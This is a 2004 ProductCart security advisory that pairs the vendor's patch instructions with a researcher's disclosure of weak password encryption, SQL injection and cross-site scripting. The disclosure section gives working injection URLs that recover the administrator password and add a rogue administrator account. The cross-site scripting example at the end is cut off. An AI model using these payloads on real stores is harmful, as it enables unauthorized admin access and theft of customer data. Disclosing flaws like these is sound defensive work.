************************************************* ** ProductCart - Security Patch - 01/30/2004 ** ************************************************* ---------------------------------- Overview ---------------------------------- Hours ago we were made aware of a security flaw in ProductCart that may allow a hacker to gain access to the Control Panel of stores using a SQL database via SQL injection. Please note that: (1) We have not received any reports of any successful SQL injection attack. (2) This security threat does NOT apply to stores using MS Access (3) Even if the SQL injection attack were successful and the attacker were about to obtain Control Panel login information (user name & password), the attacker would NOT be able to locate the Control Panel login page if you have changed the name of the PCADMIN folder. If you are using ProductCart 2.1 or later and have not applied our security recommendation to change your "pcadmin" folder name, please do so immediately. You can find instructions in the following document: http://www.earlyimpact.com/pdf/ProductCart_Security_Tips.pdf ---------------------------------- Brief Description ---------------------------------- This security threat only applies to stores using MS SQL. An SQL Injection vulnerability was found in the search files (pc/advSearch_H.asp, pc/advSearch_I.asp, pc/advSearch_L.asp, pc/advSearch_M.asp, pc/advSearch_P.asp) and the customer login page (pc/custva.asp). A detailed description can be found at the bottom of this message. ---------------------------------- How to address the problem ---------------------------------- Locate your current ProductCart version number (You can find your current version in the top left corner of the Control Panel welcome page). Once you have determined your version number, find the appropriate folder in the Zip file.... the one with the same version as yours. NOTE: Most servers have Parent Paths Enabled. If you are not sure, please check with your hosting provider. The files contained in the folder appropriate for your version should be uploaded to the "pc" folder (under the "ProductCart" folder) on the server. If you update your store to a later version of the software, please upload these files again (for the corresponding new version). ProductCart v2.53 (to be released in Feb 2004) and above will already contain these updated files. You will not need to reapply this Security Patch once you have upgraded to ProductCart v2.53 and above. >> NOTE FOR USERS OF OLD VERSIONS OF PRODUCTCART If you are running a version of ProductCart that is prior to v1.6, please contact technical support at support@earlyimpact.com and we will edit your files manually. ---------------------------------- Detailed Security Threat Description ---------------------------------- This security alert was submitted to Early Impact by S-Quadra (http://www.s-quadra.com/) >>> S-Quadra Comment: Vulnerability 1: Incorrect use of cryptography ProductCart uses stream cipher algorithm (possibly RC4) to encrypt various passwords before storing them in a database. A stream cipher generates a keystream (a sequence of bits used as a key). Encryption is accomplished by combining the keystream with the plaintext with the bitwise XOR operation. The generation of the keystream is independent of the plaintext and ciphertext. In ProductCart the single cryptographic key used to encrypt all customers and store administrator passwords so it's possible for an attacker to perform a choosen plaintext attack and obtain first 100 bytes of keystream (maximum length of customer password). Using this bytes an attacker can decrypt any encrypted information from the database including store administrator password. >>> Early Impact Comment: By uploading the attached files, a hacker will NOT be able to use the above-described flaw in the encryption schema to obtain Control Panel access information. ------------- >>> S-Quadra Comment: Vulnerability 2: SQL Injection vulnerability A SQL Injection vulnerability has been found in the 'advSearch_h.asp' script. Inproper use of user supplied input filters allows an attacker to modify SQL query and perform some kinds of SQL injection attacks. Successfull exploitation of this vulnerability could allow an attacker to gain administrative access to ProductCart store and read any information from store database (i.e. customers private data). Also an attacker could execute arbitrary commands using xp_cmdshell function. >>> Early Impact Comment: The attached files have been edited to address this issue. ------------- >>> S-Quadra Comment: Vulnerability 3: Cross Site Scripting vulnerability in 'CustVa.asp' By injecting specially crafted javascript code in url and tricking a user to visit it a remote attacker can steal user session id and gain access to user's personal data. >>> Early Impact Comment: The attached files have been edited to address this issue. ------------- >>> S-Quadra description of how the above-mentioned vulnerabilities could be exploited. Vulnerability 1 and 2: Platform: MS SQL Server as a backend ProductCart software incorrect uses cryptographic algorithms to protect store administrator password. Combination of this error and SQL injection vulnerability allow an attacker to gain administrative access to store. Performing following scenarion an attaker can find the store administrator username and password. Scenario: 1. An attacker register new customer in store. Let the value of field 'Postal Code' in the registration form will be equal to '987654' and an attacker must select long password (it should be longer then the store administrator password). 2. An attacker performs the following request http://www.shop.com/productcart/pc/advSearch_h.asp?idcategory=0&idSupplier=10&customfield=0&priceUntil=999;u--pdate%20customers%20set%20name=(s--elect%20top%201%20idadmin%20from%20admins),lastName=(s--elect%20top%01%20adminpassword%20from%20admins),phone=(s--elect%20password%20from%20customers%20where%20zip=987654)%20where%20zip=987654;s--elect%20*%20from%20products%20where%201=1&Submit.y=13&priceFrom=0&sku=&keyWord=dark&IDBrand=0&resultCnt=200&Submit.x=33& 3. An attacker goes to http://www.shop.com/productcart/pc/Custmoda.asp and reads his personal information. The value of the "FirstName" field in this form will be store administrator login name. Store administrator password is easy to find by this formula: adminpass = (Last Name) xor (Phone) xor (customer login password from scenario step 1) In the following scenario an attacker can add a new administrator to store Scenario: 1. An attacker register new customer in store. Let the value of 'First Name' field in registration form will be equal to '1*2*3*4*5*6*7*8*9*10*', the value of 'Last Name' field will be equal to '34567', the value of 'Password' field will be equal to '111' and the value of 'Postal Code' field will be equal to '987654'. 2. An attacker performs the following request: http://www.shop.com/productcart/pc/advSearch_h.asp?idcategory=0&idSupplier=10&customfield=0&priceUntil=999;in--sert%20into%20admins%20(idadmin,%20adminpassword,%20adminlevel)%20s--elect%20lastName,%20password,%20name%20from%20customers%20where%20zip=987654;s--elect%20*%20from%20products%20where%201=1&Submit.y=13&priceFrom=0&sku=&keyWord=dark&IDBrand=0&resultCnt=200&Submit.x=33& 3. An attacker logs into the store admin interface with username '34567' and password '111'. Vulnerability 3: http://www.shop.com/productcart/pc/Custva.asp?redirectUrl="><"